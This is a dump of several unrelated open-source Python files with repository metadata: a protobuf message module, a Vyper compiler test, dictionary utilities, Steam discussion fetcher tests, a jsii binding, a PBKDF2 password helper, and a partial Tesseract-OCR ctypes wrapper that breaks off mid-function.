# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='pyatv/mrp/protobuf/NowPlayingClient.proto',
package='',
syntax='proto2',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n)pyatv/mrp/protobuf/NowPlayingClient.proto\"\xe8\x01\n\x10NowPlayingClient\x12\x19\n\x11processIdentifier\x18\x01 \x01(\x05\x12\x18\n\x10\x62undleIdentifier\x18\x02 \x01(\t\x12)\n!parentApplicationBundleIdentifier\x18\x03 \x01(\t\x12\x1d\n\x15processUserIdentifier\x18\x04 \x01(\x05\x12\x1c\n\x14nowPlayingVisibility\x18\x05 \x01(\x05\x12\x13\n\x0b\x64isplayName\x18\x07 \x01(\t\x12\"\n\x1a\x62undleIdentifierHierarchys\x18\x08 \x03(\t'
)
_NOWPLAYINGCLIENT = _descriptor.Descriptor(
name='NowPlayingClient',
full_name='NowPlayingClient',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='processIdentifier', full_name='NowPlayingClient.processIdentifier', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bundleIdentifier', full_name='NowPlayingClient.bundleIdentifier', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parentApplicationBundleIdentifier', full_name='NowPlayingClient.parentApplicationBundleIdentifier', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='processUserIdentifier', full_name='NowPlayingClient.processUserIdentifier', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='nowPlayingVisibility', full_name='NowPlayingClient.nowPlayingVisibility', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='displayName', full_name='NowPlayingClient.displayName', index=5,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bundleIdentifierHierarchys', full_name='NowPlayingClient.bundleIdentifierHierarchys', index=6,
number=8, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=46,
serialized_end=278,
)
DESCRIPTOR.message_types_by_name['NowPlayingClient'] = _NOWPLAYINGCLIENT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
NowPlayingClient = _reflection.GeneratedProtocolMessageType('NowPlayingClient', (_message.Message,), {
'DESCRIPTOR' : _NOWPLAYINGCLIENT,
'__module__' : 'pyatv.mrp.protobuf.NowPlayingClient_pb2'
# @@protoc_insertion_point(class_scope:NowPlayingClient)
})
_sym_db.RegisterMessage(NowPlayingClient)
# @@protoc_insertion_point(module_scope)
| 45.053097 | 456 | 0.768022 |
f3b25970ad94fed4000e50ef02b27e02db993edc | 1,303 | py | Python | tests/parser/exceptions/test_variable_declaration_exception.py | williamremor/vyper | 4d33dc4140f7d0c339876afb6af7b417bd0ed8e0 | [
"MIT"
] | 1 | 2018-08-31T02:32:57.000Z | 2018-08-31T02:32:57.000Z | tests/parser/exceptions/test_variable_declaration_exception.py | williamremor/vyper | 4d33dc4140f7d0c339876afb6af7b417bd0ed8e0 | [
"MIT"
] | null | null | null | tests/parser/exceptions/test_variable_declaration_exception.py | williamremor/vyper | 4d33dc4140f7d0c339876afb6af7b417bd0ed8e0 | [
"MIT"
] | null | null | null | import pytest
from pytest import raises
from vyper import compiler
from vyper.exceptions import VariableDeclarationException
# Vyper contract sources that must each be rejected by the compiler with a
# VariableDeclarationException: duplicate declarations, shadowed builtins and
# reserved names (num, true, BALANCE), undeclared identifiers, and writes to
# storage variables without the `self.` prefix.
# NOTE(review): leading indentation inside these snippets appears to have been
# stripped by whatever produced this copy; Vyper is indentation-sensitive, so
# confirm the snippets against the upstream repository.
fail_list = [
"""
x: num
x: num
""",
"""
x: num
@public
def foo(x: num): pass
""",
"""
@public
def foo(x: num, x: num): pass
""",
"""
@public
def foo(num: num):
pass
""",
"""
@public
def foo():
x = 5
x: num
""",
"""
@public
def foo():
x: num
x: num
""",
"""
@public
def foo():
x: num
@public
def foo():
y: num
""",
"""
@public
def foo():
num = 5
""",
"""
@public
def foo():
bork = zork
""",
"""
x: num
@public
def foo():
x = 5
""",
"""
b: num
@public
def foo():
b = 7
""",
"""
x: wei_value
@public
def foo():
send(0x1234567890123456789012345678901234567890, x)
""",
"""
@public
def foo():
true = 3
""",
"""
@public
def foo():
self.goo()
@public
def goo():
self.foo()
""",
"""
@public
def foo():
BALANCE = 45
""",
"""
num: num
""",
"""
foo: num
@public
def foo():
pass
""",
]
# Every snippet in fail_list must make the compiler raise a
# VariableDeclarationException.
# NOTE(review): "decleration" is a typo in the test name; renaming would be
# safe for pytest collection but is kept to preserve history.
@pytest.mark.parametrize('bad_code', fail_list)
def test_variable_decleration_exception(bad_code):
    with pytest.raises(VariableDeclarationException):
        compiler.compile(bad_code)
| 11.429825 | 57 | 0.504221 |
dbdc8d7ebd84f6d221cfd7cc1892af5d102ab039 | 2,660 | py | Python | aiida_vasp/utils/extended_dicts.py | kavanase/aiida-vasp | 3941447b398f2da1ff7ffd3f3a22e18a7f7252fc | [
"MIT"
] | 1 | 2021-06-13T09:13:01.000Z | 2021-06-13T09:13:01.000Z | aiida_vasp/utils/extended_dicts.py | pzarabadip/aiida-vasp | f9edc032fb0845622c5b0bbe7e1a5bf51205dae5 | [
"MIT"
] | null | null | null | aiida_vasp/utils/extended_dicts.py | pzarabadip/aiida-vasp | f9edc032fb0845622c5b0bbe7e1a5bf51205dae5 | [
"MIT"
] | null | null | null | """
Extensions of dictionaries.
---------------------------
Extensions of Pythons standard dict as well as Aiida's AttributeDict.
"""
import collections
from copy import deepcopy
from aiida.common.extendeddicts import AttributeDict
class DictWithAttributes(AttributeDict):
    """
    Extension of the AttributeDict from Aiida.common.

    Values live in the underlying dictionary but are also reachable as
    attributes: ``attrdict.key`` mirrors ``attrdict['key']``. Reading a
    missing key through attribute access yields the dict's default
    (``None``) instead of raising.
    """

    def __getattr__(self, attr):
        """Attribute read maps to a dict lookup; missing keys return None."""
        return self.get(attr, None)

    def __setattr__(self, attr, value):
        """Attribute write maps to a dict item assignment."""
        self.__setitem__(attr, value)
def delete_keys_from_dict(dictionary, keys):
    """
    Delete entries from a nested dictionary.

    ``keys`` may be a single key or a list of keys. Dotted keys such as
    ``"some.other"`` address entries nested one mapping level per dot.
    """
    key_specs = keys if isinstance(keys, list) else [keys]
    for spec in key_specs:
        delete_nested_key(dictionary, spec.strip().split('.'))
def delete_nested_key(dictionary, keys):
    """Remove the entry addressed by the key sequence from a nested dictionary.

    Walks one mapping level per key; stops silently on empty keys, missing or
    non-mapping intermediates, and a missing final key.
    """
    from collections.abc import MutableMapping  # pylint: disable=import-outside-toplevel

    if not keys or not dictionary:
        return
    current = dictionary
    # Descend through every intermediate level; bail out quietly whenever the
    # path cannot be followed.
    for key in keys[:-1]:
        if not key:
            return
        next_level = current.get(key)
        if not isinstance(next_level, MutableMapping):
            return
        current = next_level
    last = keys[-1]
    if last:
        try:
            del current[last]
        except KeyError:
            pass
def update_nested_dict(dict1, dict2):
    """Recursively update ``dict1`` in place with the values from ``dict2``.

    Nested mappings are merged key by key; any other value from ``dict2`` is
    deep-copied into ``dict1`` so that later mutation of ``dict2`` does not
    leak into ``dict1``.
    """
    # ``collections.Mapping`` was an alias removed in Python 3.10; the ABC
    # lives in ``collections.abc``.
    from collections.abc import Mapping  # pylint: disable=import-outside-toplevel

    for key, value in dict2.items():
        dict1_value = dict1.get(key)
        if isinstance(value, Mapping) and isinstance(dict1_value, Mapping):
            update_nested_dict(dict1_value, value)
        else:
            dict1[key] = deepcopy(value)
def find_key_in_dicts(dictionary, supplied_key):
    """Yield every value stored under ``supplied_key`` in a nested dictionary.

    A matching key's value is yielded but not descended into; non-matching
    dict values are searched recursively.
    """
    for current_key, current_value in dictionary.items():
        if current_key == supplied_key:
            yield current_value
        elif isinstance(current_value, dict):
            yield from find_key_in_dicts(current_value, supplied_key)
| 32.439024 | 99 | 0.652256 |
88239a31c70435ee71c85a1dcd64de7e75c9ad3f | 47 | py | Python | irctest/scram/__init__.py | FiskFan1999/ergochat_irctest | da005d7d2492bf31c4bdeb46108240766c69d0ad | [
"MIT"
] | 16 | 2015-12-20T16:24:54.000Z | 2021-06-03T18:00:03.000Z | irctest/scram/__init__.py | FiskFan1999/ergochat_irctest | da005d7d2492bf31c4bdeb46108240766c69d0ad | [
"MIT"
] | 66 | 2015-12-20T00:23:25.000Z | 2021-08-14T09:57:04.000Z | irctest/scram/__init__.py | FiskFan1999/ergochat_irctest | da005d7d2492bf31c4bdeb46108240766c69d0ad | [
"MIT"
] | 3 | 2021-12-04T21:18:41.000Z | 2022-03-22T01:42:36.000Z | from .scram import *
from .exceptions import *
| 15.666667 | 25 | 0.744681 |
771265915f53a909345a44e4ad5aa0615d77e60e | 8,939 | py | Python | tests/fetchers/test_discussion_fetcher.py | nightblade9/steam-review-checker | bfcc9c6ec93ab8a472cfd75e22ef33167c4dc3f9 | [
"MIT"
] | null | null | null | tests/fetchers/test_discussion_fetcher.py | nightblade9/steam-review-checker | bfcc9c6ec93ab8a472cfd75e22ef33167c4dc3f9 | [
"MIT"
] | 2 | 2021-05-27T15:50:46.000Z | 2021-10-31T23:01:58.000Z | tests/fetchers/test_discussion_fetcher.py | nightblade9/steam-review-checker | bfcc9c6ec93ab8a472cfd75e22ef33167c4dc3f9 | [
"MIT"
] | 2 | 2021-02-14T07:34:47.000Z | 2021-05-27T15:20:57.000Z | import datetime
import os
import unittest
from fetchers import discussion_fetcher
class TestDicussionFetcher(unittest.TestCase):
    """Unit tests for discussion_fetcher's Steam date parsing and discussion-page HTML parsing.

    NOTE(review): this copy lost its leading indentation; the nesting below is
    reconstructed from the code's control flow — confirm against the repo.
    """

    # Page size assumed by the count-based tests below.
    _MAX_DISCUSSIONS_PER_PAGE = 50 # use proper pagination please

    def test_parse_date_converts_empty_string_to_now(self):
        for test_case in ['', ' ']:
            actual = discussion_fetcher._parse_date(test_case)
            now = datetime.datetime.now()
            self.assertEqual(actual.year, now.year)
            self.assertEqual(actual.month, now.month)
            self.assertEqual(actual.day, now.day)
            self.assertEqual(actual.hour, now.hour)
            # NOTE(review): ".min" resolves to the class constant datetime.min
            # on both sides, so this assertion is vacuous — ".minute" was
            # probably intended (same pattern recurs below).
            self.assertEqual(actual.min, now.min)

    def test_parse_date_converts_just_now_to_now(self):
        for test_case in ["just NOW", "Just now", "JuSt NoW"]:
            actual = discussion_fetcher._parse_date(test_case)
            now = datetime.datetime.now()
            self.assertEqual(actual.year, now.year)
            self.assertEqual(actual.month, now.month)
            self.assertEqual(actual.day, now.day)
            self.assertEqual(actual.hour, now.hour)
            self.assertEqual(actual.min, now.min)

    def test_parse_date_converts_minutes_ago_to_now_with_delta(self):
        for test_case in [8, 38, 1, 59]:
            actual = discussion_fetcher._parse_date("{} minutes ago".format(test_case))
            # NOTE(review): "N minutes ago" is expected as now + N minutes,
            # not now - N — presumably mirrors _parse_date's behaviour; confirm.
            expected = datetime.datetime.now() + datetime.timedelta(minutes = test_case)
            self.assertEqual(actual.year, expected.year)
            self.assertEqual(actual.month, expected.month)
            self.assertEqual(actual.day, expected.day)
            # One hour of slack tolerates roll-over between the two now() calls.
            self.assertTrue(actual.hour == expected.hour or actual.hour == expected.hour + 1)
            self.assertEqual(actual.min, expected.min)

    def test_parse_date_converts_hours_ago_to_now_with_delta(self):
        for test_case in [17, 6, 1, 23]:
            actual = discussion_fetcher._parse_date("{} hours ago".format(test_case))
            expected = datetime.datetime.now() + datetime.timedelta(hours = test_case)
            self.assertEqual(actual.year, expected.year)
            self.assertEqual(actual.month, expected.month)
            self.assertTrue(actual.day == expected.day or actual.day == expected.day + 1)
            # Hour is too tricky to assert with rollover
            self.assertEqual(actual.min, expected.min)

    def test_parse_date_converts_yearless_dates_to_current_year(self):
        for data in ["May 29", "Jan 1", "Dec 31", "Feb 28", "Aug 17"]:
            test_case = "{} @ 9:00am".format(data)
            expected = datetime.datetime.strptime(test_case, "%b %d @ %I:%M%p")
            actual = discussion_fetcher._parse_date(test_case)
            self.assertEqual(actual.year, datetime.datetime.now().year)
            # NOTE(review): stray trailing comma below makes the expression a
            # tuple; harmless but likely unintended.
            self.assertEqual(actual.month, expected.month),
            self.assertEqual(actual.day, expected.day, "Failed for {}: ex={} act={}".format(test_case, expected, actual))

    def test_parse_date_parses_date_with_year(self):
        for data in ["Jun 29, 2021", "Jan 1, 2002", "Dec 31, 1976", "Mar 16, 2015", "Oct 4, 2011"]:
            test_case = "{} @ 1:00am".format(data)
            expected = datetime.datetime.strptime(test_case, "%b %d, %Y @ %I:%M%p")
            actual = discussion_fetcher._parse_date(test_case)
            self.assertEqual(actual.year, expected.year)
            self.assertEqual(actual.month, expected.month, "Failed for {}: ex={} act={}".format(test_case, expected, actual))
            self.assertEqual(actual.day, expected.day)

    # For Oneons: detailed parsing for the first discussion; check ALL fields.
    def test_parse_discussions_can_parse_oneons_discussions(self):
        raw_html = ""
        app_id = 1342600
        with open(os.path.join("tests", "test_data", "steam_discussions", "2021", "{}.html".format(app_id)), 'r', encoding="utf-8") as file_handle:
            raw_html = file_handle.read()

        expected_discussions = 3
        actuals = discussion_fetcher._parse_discussions(raw_html, app_id, "Oneons")
        self.assertEqual(expected_discussions, len(actuals))

        # Spot-check every field on the last (oldest) parsed discussion.
        discussion = actuals[-1]
        self.assertEqual(app_id, discussion["app_id"])
        self.assertEqual("A few Suggestions", discussion["title"])
        self.assertEqual("Benjo Kabobble", discussion["author"])
        self.assertEqual("https://steamcommunity.com/app/1342600/discussions/0/2646378342121880438/", discussion["url"])
        self.assertEqual(2, int(discussion["num_replies"]))
        self.assertEqual("Oneons", discussion["game_name"])

    # Make sure we get "PINNED: <title>" discussions correctly, via Feudal Kingdoms
    def test_parse_discussions_gets_title_for_pinned_discussions(self):
        # Arrange
        raw_html = ""
        app_id = 1349900
        # NOTE(review): loop scope reconstructed so Act/Assert run for each
        # year's fixture; otherwise reading the 2020 file would be dead code.
        for data_directory in [2020, 2021]:
            with open(os.path.join("tests", "test_data", "steam_discussions", str(data_directory), "{}.html".format(app_id)), 'r', encoding="utf-8") as file_handle:
                raw_html = file_handle.read()

            # Act
            actual = discussion_fetcher._parse_discussions(raw_html, app_id, "Feudal Kingdoms")

            # Assert
            expected_titles = [
                "PINNED: Feudal Kingdoms Early Access Release postponed",
                "PINNED: Feedback",
                "PINNED: Bugs",
                "PINNED: Support",
                "Dead",
                "game delayed"
            ]
            self.assertEqual(len(expected_titles), len(actual))
            for i in range(len(expected_titles)):
                expected_title = expected_titles[i]
                actual_discussion = actual[i]
                self.assertEqual(expected_title, actual_discussion["title"])

    # For other games: discussion count is sufficient.
    def test_parse_discussions_can_parse_up_to_max_discussions(self):
        test_cases = {
            "2020": [
                {
                    "game_name": "Clam Man",
                    "app_id": 1000640,
                    "expected": 11
                },
                {
                    "game_name": "Pixelot",
                    "app_id": 1512860,
                    "expected": 12
                },
                {
                    "game_name": "Cursed: Gems 2",
                    "app_id": 643960,
                    "expected": 15 # max used when we grabbed this file
                },
                {
                    # BioMutant: page 1 ("8 minutes ago" and "Just now")
                    "game_name": "BioMutant Page 1",
                    "app_id": "597820-page1",
                    "expected": 15 # max used when we grabbed this file
                },
                {
                    "game_name": "BioMutant Last Page",
                    "app_id": "597820-page31",
                    "expected": 15 # max used when we grabbed this file
                }
            ],
            "2021": [
                {
                    "game_name": "Clam Man",
                    "app_id": 1000640,
                    "expected": 12
                },
                {
                    "game_name": "Pixelot",
                    "app_id": 1512860,
                    "expected": 13
                },
                {
                    "game_name": "Cursed: Gems 2",
                    "app_id": 643960,
                    "expected": TestDicussionFetcher._MAX_DISCUSSIONS_PER_PAGE # max
                },
                {
                    # BioMutant: page 1 ("8 minutes ago" and "Just now")
                    "game_name": "BioMutant Page 1",
                    "app_id": "597820-page1",
                    "expected": TestDicussionFetcher._MAX_DISCUSSIONS_PER_PAGE # max
                },
                {
                    "game_name": "BioMutant Last Page",
                    "app_id": "597820-lastpage",
                    "expected": 26
                }
            ]
        }

        for data_directory in ["2020", "2021"]:
            for data in test_cases[data_directory]:
                raw_html = ""
                app_id = data["app_id"]
                expected = data["expected"]
                with open(os.path.join("tests", "test_data", "steam_discussions", data_directory, "{}.html".format(app_id)), 'r', encoding="utf-8") as file_handle:
                    raw_html = file_handle.read()
                actual = discussion_fetcher._parse_discussions(raw_html, app_id, "Title goes here")
                self.assertEqual(expected, len(actual), "Failed with {} data on {}".format(data_directory, app_id)) # maxes out at 15 discussions
a6477b04ee0f1f2f55f06c5ffb636835b4dbe951 | 386 | py | Python | .venv/lib/python3.8/site-packages/aws_cdk/aws_kms/_jsii/__init__.py | sandipganguly/cdkpipeline | aecde04724a99e55d20a62cd3ccded6ceedbe967 | [
"MIT-0"
] | null | null | null | .venv/lib/python3.8/site-packages/aws_cdk/aws_kms/_jsii/__init__.py | sandipganguly/cdkpipeline | aecde04724a99e55d20a62cd3ccded6ceedbe967 | [
"MIT-0"
] | null | null | null | .venv/lib/python3.8/site-packages/aws_cdk/aws_kms/_jsii/__init__.py | sandipganguly/cdkpipeline | aecde04724a99e55d20a62cd3ccded6ceedbe967 | [
"MIT-0"
] | null | null | null | import abc
import builtins
import datetime
import enum
import typing
import jsii
import jsii.compat
import publication
import aws_cdk.aws_iam._jsii
import aws_cdk.core._jsii
import constructs._jsii
# Auto-generated jsii binding module for @aws-cdk/aws-kms: loads the bundled
# JavaScript assembly so the Python classes in this package can proxy into it.
__jsii_assembly__ = jsii.JSIIAssembly.load(
    "@aws-cdk/aws-kms", "1.56.0", __name__[0:-6], "aws-kms@1.56.0.jsii.tgz"
)

# Only the assembly handle is part of this module's public API.
__all__ = [
    "__jsii_assembly__",
]

publication.publish()
| 16.083333 | 75 | 0.756477 |
d617ac4a894c0eaf8d75e238abe61954f653e261 | 700 | py | Python | password.py | tonywh/es50w-project1 | 4a2e220741c780faaa8720fc10324f9428596f48 | [
"MIT"
] | null | null | null | password.py | tonywh/es50w-project1 | 4a2e220741c780faaa8720fc10324f9428596f48 | [
"MIT"
] | null | null | null | password.py | tonywh/es50w-project1 | 4a2e220741c780faaa8720fc10324f9428596f48 | [
"MIT"
] | null | null | null | import hashlib, binascii, os
# Returns salt + password-hash ready for storing.
def hash_password(password):
    """Hash a password for storage.

    Result is 64 hex chars of random salt followed by 128 hex chars of the
    PBKDF2-HMAC-SHA512 digest (100000 iterations), as a single ascii string.
    """
    random_salt = hashlib.sha256(os.urandom(60)).hexdigest().encode('ascii')
    digest = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'),
                                 random_salt, 100000)
    digest_hex = binascii.hexlify(digest)
    return (random_salt + digest_hex).decode('ascii')
# Returns True on correct match
def verify_password(stored_password, provided_password):
    """Check a candidate password against a stored hash_password() string.

    :param stored_password: 64 hex chars of salt followed by 128 hex chars of
        PBKDF2-HMAC-SHA512 digest, as produced by hash_password().
    :param provided_password: candidate plaintext password.
    :return: True when the password matches, False otherwise.
    """
    import hmac  # local import keeps the module's import line untouched

    salt = stored_password[:64]
    stored_hash = stored_password[64:]
    hash_bin = hashlib.pbkdf2_hmac('sha512', provided_password.encode('utf-8'),
                                   salt.encode('ascii'), 100000)
    computed_hash = binascii.hexlify(hash_bin).decode('ascii')
    # Constant-time comparison avoids leaking digest bytes via timing.
    return hmac.compare_digest(computed_hash, stored_hash)
927f3300269a365ce1968262405aa19b12e88151 | 17,125 | py | Python | source/pytessy.py | sydneyprovence/pytessy | f16ec8bf13f50e3b7bd1247f8785fbb64aa665c8 | [
"BSL-1.0"
] | null | null | null | source/pytessy.py | sydneyprovence/pytessy | f16ec8bf13f50e3b7bd1247f8785fbb64aa665c8 | [
"BSL-1.0"
] | null | null | null | source/pytessy.py | sydneyprovence/pytessy | f16ec8bf13f50e3b7bd1247f8785fbb64aa665c8 | [
"BSL-1.0"
] | 1 | 2021-06-08T20:25:19.000Z | 2021-06-08T20:25:19.000Z | #!/usr/bin/python3
"""
_ _
(_) | |
_ __ _ __ __ ___ | |
| '__| | | \ \/ / / _ \ | |
| | | | > < | __/ | |
|_| |_| /_/\_\ \___| |_|
PyTessy
=======
Tesseract-OCR, faster!
This module allows faster access to Tesseract-OCR from Python scripts.
This module is always faster than common Tesseract-OCR wrappers like pytesseract
because it uses direct access to Tesseract-OCR's core library instead of calling
its executable.
The specification of the connection to the driver is based on the source code
from here: https://github.com/UB-Mannheim/tesseract/blob/master/src/api/capi.cpp
Copyright rixel 2020
Distributed under the Boost Software License, Version 1.0.
See accompanying file LICENSE or a copy at https://www.boost.org/LICENSE_1_0.txt
"""
import __main__
import ctypes
import ctypes.util
from os import chdir, environ, getcwd
from os.path import abspath, dirname, isabs, isdir, isfile, join
from sys import platform
class PyTessyError(Exception):
    """
    PyTessyError class
    ------------------
    Module-specific exception type; adds no behaviour beyond Exception.
    """
class TesseractHandler(object):
    """
    TesseractHandler class
    ----------------------
    Handles raw Tesseract-OCR calls with limited functionality only.
    """

    # Shared, lazily-created ctypes handle to the Tesseract-OCR shared
    # library (one per process); the per-instance API handle lives in _api.
    _lib = None
    _api = None

    class TessBaseAPI(ctypes._Pointer):
        """
        TessBaseAPI
        -----------
        Empty ctypes._Pointer subclass to serve as TessBaseAPI handler pointer.
        """
        _type_ = type('_TessBaseAPI', (ctypes.Structure,), {})

    def __init__(self, lib_path=None, data_path=None, language='eng'):
        """
        Initializes Tesseract-OCR api handler object instance
        -----------------------------------------------------
        @Params: lib_path  (string) [optional] Path to Tesseract-OCR library.
                 data_path (string) [optional] Path to Tesseract-OCR data files.
                 language  (string) [optional] Language code to work with.
        """
        if self._lib is None:
            self.setup_lib(lib_path)
        self._api = self._lib.TessBaseAPICreate()
        # A non-zero return from Init3 signals failure.
        # NOTE(review): the 'initalize' typo is inside a runtime error string
        # and is therefore left untouched here.
        if self._lib.TessBaseAPIInit3(self._api, data_path.encode('ascii'),
                                      language.encode('ascii')):
            raise PyTessyError('Failed to initalize Tesseract-OCR library.')

    def get_text(self):
        """
        Gets text as utf-8 decoded string
        ---------------------------------
        @Return: (string) Text read by Tesseract-OCR as utf-8 string.
        """
        self._check_setup()
        result = self._lib.TessBaseAPIGetUTF8Text(self._api)
        if result:
            return result.decode('utf-8')
        else:
            # NULL / empty result from the C API maps to an empty string.
            return ""

    def get_text_raw(self):
        """
        Gets text as raw bytes data
        ---------------------------
        @Return: (bytes) Text read by Tesseract-OCR as raw bytes .
        """
        self._check_setup()
        # restype is c_char_p, so this is the undecoded bytes (or None).
        return self._lib.TessBaseAPIGetUTF8Text(self._api)

    def set_image(self, imagedata, width, height, bytes_per_pixel, bytes_per_line,
                  resolution):
        """
        Sets image to read
        ------------------
        @Params: imagedata       (ctypes int array) Raw imagedata to read.
                 width           (int)              Width of the image.
                 height          (int)              Height of the image.
                 bytes_per_pixel (int)              Number of bytes that
                                                    represents a pixel.
                 bytes_per_line  (int)              Number of bytes in a line.
                 resolution      (int)              Resolution of the image
                                                    in dpi.
        """
        self._check_setup()
        self._lib.TessBaseAPISetImage(self._api,
                                      imagedata, width, height,
                                      bytes_per_pixel, bytes_per_line)
        self._lib.TessBaseAPISetSourceResolution(self._api, resolution)

    def set_variable(self, key, val):
        """
        Sets a Tesseract config variable on the API handle
        --------------------------------------------------
        @Params: key (bytes) Variable name, e.g. b"tessedit_pageseg_mode".
                 val (bytes) Variable value as a byte string.
        """
        self._check_setup()
        self._lib.TessBaseAPISetVariable(self._api, key, val)

    @classmethod
    def setup_lib(cls, lib_path=None):
        """
        Binds Tesseract-OCR library to the handler
        ------------------------------------------
        @Params: (string) [optional] Path to Tesseract-OCR library.
        @Raises: PyTessyError If ctypes cannot find Tesseract-OCR library.
        """
        if cls._lib is not None:
            return
        lib_path = ctypes.util.find_library(lib_path)
        if lib_path is None:
            raise PyTessyError('Ctypes couldn\'t find Tesseract-OCR library')
        cls._lib = lib = ctypes.CDLL(lib_path)
        # Declare argument/return types for each C entry point used; getting
        # these wrong corrupts the call, so they mirror Tesseract's capi.
        lib.TessBaseAPICreate.restype = cls.TessBaseAPI # handle
        lib.TessBaseAPIDelete.restype = None # void
        lib.TessBaseAPIDelete.argtypes = (cls.TessBaseAPI,) # handle
        lib.TessBaseAPIInit3.argtypes = (cls.TessBaseAPI, # handle
                                         ctypes.c_char_p, # datapath
                                         ctypes.c_char_p) # language
        lib.TessBaseAPISetImage.restype = None # void
        lib.TessBaseAPISetImage.argtypes = (cls.TessBaseAPI, # handle
                                            ctypes.c_void_p, # imagedata
                                            ctypes.c_int, # width
                                            ctypes.c_int, # height
                                            ctypes.c_int, # bytes_per_pixel
                                            ctypes.c_int) # bytes_per_line
        lib.TessBaseAPISetVariable.argtypes = (cls.TessBaseAPI,
                                               ctypes.c_char_p,
                                               ctypes.c_char_p)
        lib.TessBaseAPIGetUTF8Text.restype = ctypes.c_char_p # text
        lib.TessBaseAPIGetUTF8Text.argtypes = (cls.TessBaseAPI, ) # handle
        lib.TessBaseAPISetSourceResolution.restype = None # void
        lib.TessBaseAPISetSourceResolution.argtypes = (cls.TessBaseAPI, # handle
                                                       ctypes.c_int) # ppi

    def _check_setup(self):
        """
        Checks whether Tesseract-OCR is set up or not
        ---------------------------------------------
        @Raises: PyTessyError If library handler not yet configured.
                 PyTessyError If api handler not yet configured.
        """
        if not self._lib:
            raise PyTessyError('Tesseract handler library not configured.')
        if not self._api:
            raise PyTessyError('Tesseract handler api not created.')

    def __del__(self):
        """
        Disconnects TessBaseAPI when instance is deleted
        ------------------------------------------------
        """
        if not self._lib or not self._api:
            return
        # The 'closed' flag guards against freeing the native handle twice.
        if not getattr(self, 'closed', False):
            self._lib.TessBaseAPIDelete(self._api)
            self.closed = True
class PyTessy(object):
    """
    PyTessy
    -------
    Provides user-friendly and fast Tesseract-OCR interface.
    """
    DEFAULT_HORIZONTAL_DPI = 96
    TESSDATA_DIRNAME = 'tessdata'
    TESSERACT_DIRNAME = 'Tesseract-OCR'
    TESSERACT_DEFAULT_HORIZONTAL_DPI = 70
    VERSION = '0.0.1'

    def __init__(self, tesseract_path=None, api_version=None, lib_path=None,
                 data_path=None, language='eng', verbose_search=False,
                 oem=1, psm=7, char_whitelist=None):
        """
        Initializes PyTessy instance
        ----------------------------
        @Params: tesseract_path (string)  [optional] Directory containing the
                                          Tesseract-OCR library.
                 api_version    (string)  [optional] Api version suffix string
                                          (should be compatible with
                                          Tesseract-OCR 3).
                 lib_path       (string)  [optional] Exact path to the
                                          Tesseract-OCR library.
                 data_path      (string)  [optional] Path (directory's name)
                                          to data directory (usually "tessdata").
                 language       (string)  [optional] Language code to use.
                 verbose_search (boolean) [optional] Whether to display
                                          library searching process or not.
                 oem            (int)     [optional] OCR engine mode.
                 psm            (int)     [optional] Page segmentation mode.
                 char_whitelist (bytes)   [optional] Characters Tesseract may
                                          recognize; forwarded unchanged.
        @Raises: NotImplementedError If the operating system is not (or never
                                     will be) supported by the library search;
                                     avoid by passing an exact lib_path.
                 FileNotFoundError   If lib_path doesn't exist, the search
                                     fails, or "tessdata" cannot be found.
        """
        run_path = dirname(abspath(__main__.__file__))
        no_lib = True
        if lib_path is not None:
            if isfile(lib_path):
                no_lib = False
            else:
                raise FileNotFoundError('PyTessy: lib_path: "{}" doesn\'t exist.'
                                        .format(lib_path))
        if no_lib:
            if verbose_search:
                verbose = lambda *pa, **pk: print(*pa, **pk)
            else:
                verbose = lambda *pa, **pk: None
            if platform.startswith('win'):
                verbose('PyTessy v{} on {} searching for Tesseract-OCR library...'
                        .format(PyTessy.VERSION, platform))
                if api_version is None:
                    lib_name = 'libtesseract-5'
                else:
                    lib_name = 'libtesseract{}'.format(api_version)
                verbose('--- Target library name: {}'.format(lib_name))
                # Candidate directories, most specific first; Program Files
                # locations are appended when the environment provides them.
                if tesseract_path is not None:
                    dirs = [tesseract_path, run_path, join(run_path, PyTessy.TESSERACT_DIRNAME)]
                else:
                    dirs = [run_path, join(run_path, PyTessy.TESSERACT_DIRNAME)]
                if 'PROGRAMFILES' in environ:
                    dirs.append(join(environ['PROGRAMFILES'], PyTessy.TESSERACT_DIRNAME))
                if 'PROGRAMFILES(X86)' in environ:
